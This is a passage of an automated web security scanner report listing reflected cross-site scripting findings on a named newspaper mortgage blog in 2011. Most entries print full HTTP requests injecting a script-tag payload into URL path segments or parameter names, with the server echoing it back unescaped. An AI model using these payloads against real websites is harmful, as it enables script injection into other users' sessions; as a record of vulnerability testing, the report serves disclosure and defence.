User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009766d2\"><script>alert(1)</script>feecef77490/10/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95802"><script>alert(1)</script>54504d64364 was submitted in the REST URL parameter 2. This input was echoed as 95802\"><script>alert(1)</script>54504d64364 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/1095802"><script>alert(1)</script>54504d64364/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/1095802\"><script>alert(1)</script>54504d64364/feed/" /> ...[SNIP]...
1.311. http://mortgage.ocregister.com/2009/10/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/10/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef3c3"><script>alert(1)</script>f4108a4af6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ef3c3\"><script>alert(1)</script>f4108a4af6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/10/?ef3c3"><script>alert(1)</script>f4108a4af6=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108827
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/10/?ef3c3\"><script>alert(1)</script>f4108a4af6=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39ed8"><script>alert(1)</script>ab1683ae201 was submitted in the REST URL parameter 1. This input was echoed as 39ed8\"><script>alert(1)</script>ab1683ae201 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200939ed8"><script>alert(1)</script>ab1683ae201/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200939ed8\"><script>alert(1)</script>ab1683ae201/11/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e730d"><script>alert(1)</script>71e0e703e3e was submitted in the REST URL parameter 2. This input was echoed as e730d\"><script>alert(1)</script>71e0e703e3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/11e730d"><script>alert(1)</script>71e0e703e3e/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/11e730d\"><script>alert(1)</script>71e0e703e3e/feed/" /> ...[SNIP]...
1.314. http://mortgage.ocregister.com/2009/11/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2009/11/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84d57"><script>alert(1)</script>16d0da66f08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84d57\"><script>alert(1)</script>16d0da66f08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/11/?84d57"><script>alert(1)</script>16d0da66f08=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/11/?84d57\"><script>alert(1)</script>16d0da66f08=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce109"><script>alert(1)</script>3534b7ba531 was submitted in the REST URL parameter 1. This input was echoed as ce109\"><script>alert(1)</script>3534b7ba531 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009ce109"><script>alert(1)</script>3534b7ba531/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009ce109\"><script>alert(1)</script>3534b7ba531/12/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1391f"><script>alert(1)</script>20503540395 was submitted in the REST URL parameter 2. This input was echoed as 1391f\"><script>alert(1)</script>20503540395 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/121391f"><script>alert(1)</script>20503540395/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/121391f\"><script>alert(1)</script>20503540395/feed/" /> ...[SNIP]...
1.317. http://mortgage.ocregister.com/2009/12/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2009/12/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7488"><script>alert(1)</script>f79a6b90c3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7488\"><script>alert(1)</script>f79a6b90c3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/12/?c7488"><script>alert(1)</script>f79a6b90c3f=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/12/?c7488\"><script>alert(1)</script>f79a6b90c3f=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 935fb"><script>alert(1)</script>77d498ba61a was submitted in the REST URL parameter 1. This input was echoed as 935fb\"><script>alert(1)</script>77d498ba61a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010935fb"><script>alert(1)</script>77d498ba61a/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010935fb\"><script>alert(1)</script>77d498ba61a/01/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9d7d"><script>alert(1)</script>ca8ccf11586 was submitted in the REST URL parameter 2. This input was echoed as d9d7d\"><script>alert(1)</script>ca8ccf11586 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/01d9d7d"><script>alert(1)</script>ca8ccf11586/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/01d9d7d\"><script>alert(1)</script>ca8ccf11586/feed/" /> ...[SNIP]...
1.320. http://mortgage.ocregister.com/2010/01/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2010/01/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc50"><script>alert(1)</script>ec9310bc127 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fc50\"><script>alert(1)</script>ec9310bc127 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/01/?6fc50"><script>alert(1)</script>ec9310bc127=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/01/?6fc50\"><script>alert(1)</script>ec9310bc127=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 712e3"><script>alert(1)</script>9e5b2bfe9ed was submitted in the REST URL parameter 1. This input was echoed as 712e3\"><script>alert(1)</script>9e5b2bfe9ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010712e3"><script>alert(1)</script>9e5b2bfe9ed/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010712e3\"><script>alert(1)</script>9e5b2bfe9ed/02/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b385"><script>alert(1)</script>122a8b5d193 was submitted in the REST URL parameter 2. This input was echoed as 7b385\"><script>alert(1)</script>122a8b5d193 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/027b385"><script>alert(1)</script>122a8b5d193/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/027b385\"><script>alert(1)</script>122a8b5d193/feed/" /> ...[SNIP]...
1.323. http://mortgage.ocregister.com/2010/02/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2010/02/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efb2"><script>alert(1)</script>1b95ace2821 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6efb2\"><script>alert(1)</script>1b95ace2821 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/02/?6efb2"><script>alert(1)</script>1b95ace2821=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/02/?6efb2\"><script>alert(1)</script>1b95ace2821=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2292"><script>alert(1)</script>bcdb1fec87 was submitted in the REST URL parameter 1. This input was echoed as f2292\"><script>alert(1)</script>bcdb1fec87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010f2292"><script>alert(1)</script>bcdb1fec87/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
